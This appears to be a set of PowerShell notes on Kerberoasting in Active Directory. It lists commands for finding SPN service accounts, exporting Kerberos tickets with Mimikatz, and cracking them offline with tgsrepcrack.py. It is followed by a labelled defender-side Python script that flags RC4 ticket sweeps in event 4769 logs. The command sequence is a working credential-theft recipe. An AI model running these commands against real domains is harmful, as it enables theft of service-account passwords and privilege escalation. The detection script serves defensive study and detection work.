Powershell * POWERSHELL SECURITY

Domain Privesc

Find user accounts used as service accounts (accounts with an SPN set):

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Check if the TGS has been granted (the service ticket shows up in the local ticket cache):

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> klist

Export all tickets using mimikatz:

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::list /export"'

Crack the exported .kirbi ticket offline with tgsrepcrack.py (https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py):

PS C:\Users\victim.SECURITY\Downloads\kerberoast-master\kerberoast-master> python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt .\2-40a50000-victim@ldap~WIN-2RUMVG5JPOC.security.local~security.local-SECURITY.LOCAL.kirbi…
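Added defender-side example, not part of these notes: the sweep above leaves a trace in Windows Security event 4769 ("A Kerberos service ticket was requested") as one requester obtaining RC4-HMAC (TicketEncryptionType 0x17) service tickets for several SPN accounts within a short span. The script below flags that pattern over constructed 4769-style records; field names follow the event, the sample values and the hostnames are made up.

```python
# Detect a Kerberoast-style sweep in event 4769 records: one (user, source IP)
# requesting RC4 service tickets for many distinct SPN accounts in a short window.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC in event 4769

# Constructed sample log, one tuple per 4769 event:
# (TimeCreated, TargetUserName, ServiceName, TicketEncryptionType, IpAddress)
SAMPLE_4769 = [
    ("2024-01-10T09:00:01", "victim@SECURITY.LOCAL", "svc_sql", "0x17", "10.0.0.15"),
    ("2024-01-10T09:00:02", "victim@SECURITY.LOCAL", "svc_web", "0x17", "10.0.0.15"),
    ("2024-01-10T09:00:03", "victim@SECURITY.LOCAL", "svc_bkp", "0x17", "10.0.0.15"),
    ("2024-01-10T09:00:04", "victim@SECURITY.LOCAL", "krbtgt", "0x12", "10.0.0.15"),
    ("2024-01-10T09:05:00", "alice@SECURITY.LOCAL", "WIN-2RUMVG5JPOC$", "0x12", "10.0.0.21"),
    ("2024-01-10T09:30:00", "bob@SECURITY.LOCAL", "svc_sql", "0x17", "10.0.0.22"),
]


def find_kerberoast_sweeps(events, window=timedelta(minutes=5), min_spns=3):
    """Return {(user, ip): sorted service names} for every requester that obtained
    RC4 service tickets for at least `min_spns` distinct user SPN accounts
    (krbtgt and computer accounts excluded) inside one `window`."""
    per_source = defaultdict(list)
    for time, user, svc, etype, ip in events:
        if etype.lower() != RC4_HMAC:
            continue  # AES tickets are not the weak-crypto request the attack relies on
        if svc == "krbtgt" or svc.endswith("$"):
            continue  # TGT renewals and machine accounts are not crackable user SPNs
        per_source[(user, ip)].append((datetime.fromisoformat(time), svc))

    hits = {}
    for key, reqs in per_source.items():
        reqs.sort()
        # slide a window starting at each request and count distinct SPNs inside it
        for i, (start, _) in enumerate(reqs):
            spns = {s for t, s in reqs[i:] if t - start <= window}
            if len(spns) >= min_spns:
                hits[key] = sorted(spns)
                break
    return hits


if __name__ == "__main__":
    for (user, ip), spns in find_kerberoast_sweeps(SAMPLE_4769).items():
        print(f"possible Kerberoast sweep by {user} from {ip}: {', '.join(spns)}")
```

Tune `window` and `min_spns` to the environment; a single RC4 ticket request (bob above) is normal for legacy services and is deliberately not flagged.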